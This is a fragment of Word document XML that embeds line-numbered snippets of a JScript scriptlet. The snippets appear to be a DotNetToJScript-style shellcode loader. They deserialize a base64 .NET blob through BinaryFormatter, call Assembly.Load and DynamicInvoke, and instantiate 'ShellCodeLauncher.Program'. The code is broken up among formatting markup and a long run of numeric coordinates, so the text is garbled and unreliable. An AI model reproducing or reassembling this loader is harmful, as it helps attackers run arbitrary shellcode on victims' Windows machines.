56,14348,3356,14350,3356,14353,3356,14356,3356,14359,3356,14362,3356,14365,3356,14368,3356,14371,3356,14374,3356,14377,3356,14381,3356,14384,3356,14388,3356,14392,3356,14395,3356,14399,3356,14403,3356,14407,3356,14411,3356,14415,3356,14419,3356,14424,3356,14428,3356,14433,3356,14437,3356,14442,3356,14447,3356,14451,3356,14456,3356,14462,3356,14467,3356,14472,3356,14477,3356,14483,3356,14488,3356,14494,3356,14500,3356,14505,3356,14511,3356,14518,3356,14524,3356,14530,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3356,14536,3355,14536,3355,14536,3355,14536,3355,14536,3355,14536,3355,14536,3355,14536,3355,14536,3355,14536,3355,14536,3355,14536,3355,14536,3354,14536,3354,14536,3354,14536,3354,14536,3354,14536,3354,14536,3353,14536,3353,14536,3353,14536,3353,14536,3352,14536,3352,14536,3352,14536,3351,14536,3351,14536,3351,14536,3350,14536,3350,14536,3350,14536,3349,14536,3349,14536,3348,14536,3348,14536,3347,14536,3347,14536,3346,14536,3346,14536,3345,14536,3344,14536,3344,14536,3343,14536,3342,14536,3342,14536,3341,14536,3340,14536,3340,14536,3339,14536,3338,14536,3337,14536,3336,14536,3335,14536,3334,14536,3333,14536,3332,14536,3331,14536,3330,14536,3329,14536,3328,14536,3327,14536,3326,14536,3324,14536,3323,14536,3322,14536,3321,14536,3319,14536,3318,14536,3316,14536,3315,14536,3313,14536,3312,14536,3310,14536,3309,14536,3307,14536,3305,14536,3304,14536,3302,14536,3300,14536,3298,14536,3297,14536,3295,14536,3293,14536,3291,14536,3289,14536,3287,14536,3284,14536,3282,14536,3280,14536,3278,14536,3276,14536,3273,14536,3271,14536,3268,14536,3266,14536,3263,14536,3261,14536,3258,14536,3256,14536,3253,14536,3250,14536,3247,14536,3244,14536,3242,14536,3239,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14536,3236,14535,3236,14535,3236,14535,3236,14535,3236,14535,3236,14534,3236,14534,3236,14534,3236,14534,3236,14533,3236,14533,3236,14533,3236,14532,3236,14532,3236,14531,3236,14531,3236,14530,3236,14530,3236,14529,3236,14529,3236,14528,3236,14527,3236,14527,3236,14526,3236,14525,3236,14524,3236,14523,3236,14523,3236,14522,3236,14521,3236,14520,3236,14519,3236,14517,3236,14516,3236,14515,3236,14514,3236,14512,3236,14511,3236,14510,3236,14508,3236,14507,3236,14505,3236,14504,3236,14502,3236,14500,3236,14498,3236,14497,3236,14495,3236,14493,3236,14491,3236,14489,3236,14487,3236,14484,3236,14482,3236,14480,3236,14477,3236,14475,3236,14472,3236,14470,3236,14467,3236,14464,3236,14462,3236,14459,3236,14456,3236,14453,3236,14450,3236,14447,3236,14443,3236,14440,3236,14437,3236,14433,3236,14430,3236,14426,3236,14422,3236,14418,3236,14415,3236,14411,3236,14407,3236,14402,3236,14398,3236,14394,3236,14389,3236,14385,3236,14380,3236,14376,3236,14371,3236,14366,3236,14361,3236,14356,3236,14351,3236,14346,3236,14340,3236,14335,3236,14329,3236,14324,3236,14318,3236,14312,3236,14306,3236,14300,3236,14294,3236,14288,3236,1428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126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127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128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129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130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131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132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133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134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"AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3Rl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bS5SZWZs"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135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"ZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="19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1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entry_class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'ShellCodeLauncher.Program'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="29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137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10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>138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13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>try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404549"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{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139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setversion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stm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base64ToStream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serialized_obj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8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141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fmt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ActiveXObject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'System.Runtime.Serialization.Formatter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s.Binary.BinaryFormatter'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al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ActiveXObject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'System.Collections.ArrayList'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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143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fmt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Deserialize_2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stm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al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Add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undefined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316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="1609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145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DynamicInvoke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al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ToArray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CreateInstance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entry_class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146</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="58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147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catch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148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debug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message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53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149</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-6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150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1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>151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989898"/>
          <w:spacing w:val="1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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="1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8572" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>152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script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="1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153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154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component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8452" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>155</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-12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package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156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58.200pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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